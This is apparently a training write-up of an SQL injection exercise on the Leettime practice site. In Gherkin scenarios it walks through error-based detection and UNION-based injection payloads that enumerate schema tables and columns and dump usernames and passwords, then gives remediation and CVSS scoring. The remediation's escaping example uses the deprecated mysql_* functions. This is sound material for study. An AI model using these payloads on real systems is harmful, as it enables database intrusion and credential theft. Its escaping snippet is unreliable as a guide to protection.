## Version 1.4.1
## language: en

Feature:
  TOE:
    Leettime
  Category:
    SQL Injection
  Location:
    http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
  CWE:
    CWE-089: Improper Neutralization of Special Elements used
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Exploit SQL injection vulnerability
  Recommendation:
    Sanitize inputs to avoid SQL statements

  Background:
  Hacker Software:
    | <Software name>    |  <Version> |
    | Firefox            |   79.0     |
    | Windows            |   10.0     |

  TOE information:
    Given I access the site
    Then I see a message:
    """
    Username is : injector
    """
    And nothing more

  Scenario: Normal use case
    Given I access the site
    And I see a "<br />" message centralized indicating that the user is
    """
    injector
    """
    Then I notice that nothing happens [evidences](normal.png)

  Scenario: Static detection
    Given I can't access the backend code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
    Then I see a user called "injector"
    And I notice an id
    Then I test if this id is dynamic
    And I try id = 2
    Then I notice that the user has changed to
    """
    Username is : decompiler
    """ [evidences](id2.png)
    And this behavior is clear from SQL queries
    Then I check if I can break the syntax looking for some kind of SQLi
    """
    http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1'
    """
    And placing a single quote I manage to generate a MySQL error
    Then I got the following error:
    """
    Error While Selection process : You have an error in your SQL syntax;
    check the manual that corresponds to your MySQL server version for
    the right syntax to use near ''1'')' at line 1
    """ [evidences](sqli.png)
    Then I can conclude that it is vulnerable to SQL injections

  Scenario: Exploitation
    Given the site is vulnerable to SQL injection
    Then the idea is to take advantage of the vuln to query the database
    And for this I need understand how to query works
    When I see the error: "... near ''1'')'"
    Then I can determine that the query can be like the following:
    """
    select username from table_user where id='('1')'
    """
    And if I manage to break the query with a single quote
    Then to control the query I must escape the parenthesis ")"
    And there is still a closed parenthesis
    Then I comment it so that MySQL does not interpret it as a query
    And the prototype to perform arbitrary queries would look like this:
    """
    basic_ch4.php?id=1') -- -
    """
    Then this way I don't get error
    And I control the query [evidences](noerror.png)
    Then I thought it would be a good idea to get the users from the DDBB
    And the first thing is to know the number of columns in the table
    Then for this I can use "order by" technique [evidences](orderby5.png)
    """
    basic_ch4.php?id=1') order by 5 -- -
    """
    Then the site returns:
    """
    Error While Selection process : Unknown column '5' in 'order clause'
    """
    And this means that the table has less than 5 columns
    Then I realized that the table has only 4 columns because with
    """
    basic_ch4.php?id=1') order by 4 -- -
    """
    When the site doesn't returns any error [evidences](orderby4.png)
    Then I continue to combine (union select ) this table
    And in order to have more information about the DDBB
    """
    basic_ch4.php?id=1') union select 1,2,3,4 -- -
    """ [evidences](union.png)
    When I do this, I realize that the values returned by the table
    Then correspond to column 2 of this
    """
    Username is : injector
    Username is : 2
    """
    And I use it to get the name of the tables in the DDBB (database)
    """
    basic_ch4.php?id=1') union select 1,table_name,3,4
    from information_schema.tables -- -
    """ [evidences](tables.png)
    Then this is possible because "information_schema.tables" provides info
    And all about the tables in the database
    Then I notice an interesting table "users" [evidences](tableusers.png)
    And I get more information about this table
    """
    basic_ch4.php?id=1') union select 1,column_name,3,4
    from information_schema.columns where table_name = 'users' -- -
    """ [evidences](columnsusers.png)
    Then I see that there is a lot of interesting data in those columns
    """
    Username is : injector
    Username is : id
    Username is : username
    Username is : password
    Username is : user_type
    Username is : sec_code
    """
    And I decide to get info of only 2, username and password
    """
    basic_ch4.php?id=1') union select 1,
    group_concat(username, 0x3a3a, password),3,4 from users -- -
    """
    And that's it [evidences](datausers.png)

  Scenario: Remediation
    Given The site is susceptible to SQL injection attacks
    Then there are many ways to defend against these types of attacks
    """
    1. Use of Prepared Statements (with Parameterized Queries)
    2. Use of Stored Procedures
    3. Whitelist Input Validation
    4. Escaping All User Supplied Input
    5. Among other
    """
    And this is a example of escaping input:
    """
    //Connect

    $unsafe_variable = $_POST["user-input"];
    $safe_variable = mysql_real_escape_string($unsafe_variable);

    mysql_query("INSERT INTO table (column) VALUES ('".$safe_variable."')");

    //Disconnect
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental:Unique and relevant attributes to a specific user environment
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-09-29
